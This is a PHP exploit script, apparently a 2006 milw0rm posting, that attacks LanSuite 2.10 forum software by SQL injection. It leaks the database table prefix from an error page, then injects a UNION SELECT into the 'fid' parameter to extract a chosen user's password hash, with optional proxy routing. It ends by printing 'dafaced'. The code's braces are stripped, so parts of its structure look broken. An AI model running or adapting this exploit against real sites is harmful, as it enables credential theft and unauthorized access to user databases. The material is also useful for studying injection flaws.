function xss_init()
if (!extension_loaded('php_curl'))
if (!dl('curl.so') and !dl('php_curl.so') and !dl('php_curl.dll'))
die ("oo error - cannot load curl extension!");
function xss_header()
echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo";
echo " oo ooooooo ooooooo\n";
echo " oooo oooo o888 o88 888 o888 888o\n";
echo " 888o888 888 o888 888888888\n";
echo " o88888o 888 o888 o 888o o888\n";
echo " o88o o88o o888o o8888oooo88 88ooo88\n";
echo "oooooooooooooooooooooo lansuite 2.10 remote sql injection oooooooooooooooooooooo\n";
echo "oo usage $ php lansuite-210-exploit.php [url] [user id]\n";
echo "oo proxy support $ php lansuite-210-exploit.php [url] [user id] [proxy]:[port]\n";
echo "oo example $ php lansuite-210-exploit.php http://localhost 1\n";
echo "oo print the password of the user\n\n";
function xss_bottom()
echo "\noo developed for the [myg0t] online gaming group\n";
echo "oo discover : x128 - alexander wilhelm - 24/02/2006\n";
echo "oo contact : exploit <at> x128.net oo website : www.x128.net";
function xss_exploit()
$xss_target = $_SERVER['argv'][1] . "/index.php";
$xss_http_prefix_get = "?mod=board&action=forum&fid=x128";
$xss_connection = curl_init();
if ($_SERVER['argv'][3])
curl_setopt($xss_connection, CURLOPT_TIMEOUT, 8);
curl_setopt($xss_connection, CURLOPT_PROXY, $_SERVER['argv'][3]);
curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_prefix_get);
curl_setopt ($xss_connection, CURLOPT_HEADER, 0);
curl_setopt ($xss_connection, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($xss_connection, CURLOPT_USERAGENT, 'x128');
$xss_prefix_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n");
$xss_prefix = substr(strstr($xss_prefix_source, "need_type FROM "), 15, strpos(strstr($xss_prefix_source, "need_type FROM "), "board_forums") - 15);
$xss_http_get = "?mod=board&action=forum&fid=" . urlencode("0 UNION SELECT 1, 1, 1, 1, 1, 1, password, 1, 1, 1, 1 FROM ". $xss_prefix ."user WHERE userid = ". $_SERVER['argv'][2] ."/*");
curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_get);
$xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!\n");
$xss_passwd = substr(strstr($xss_source, "b.userid WHERE pid = "), 21, 32);
if ($xss_passwd == "") { $xss_passwd = substr(strstr($xss_source, "Unknown column '"), 16, 32); }
if ($_SERVER['argv'][2] && $xss_passwd)
echo "oo user " . $_SERVER['argv'][2] . "\n";
echo "oo password " . $xss_passwd . "\n\n";
echo "oo dafaced ...\n";
curl_close ($xss_connection);
# milw0rm.com [2006-02-24]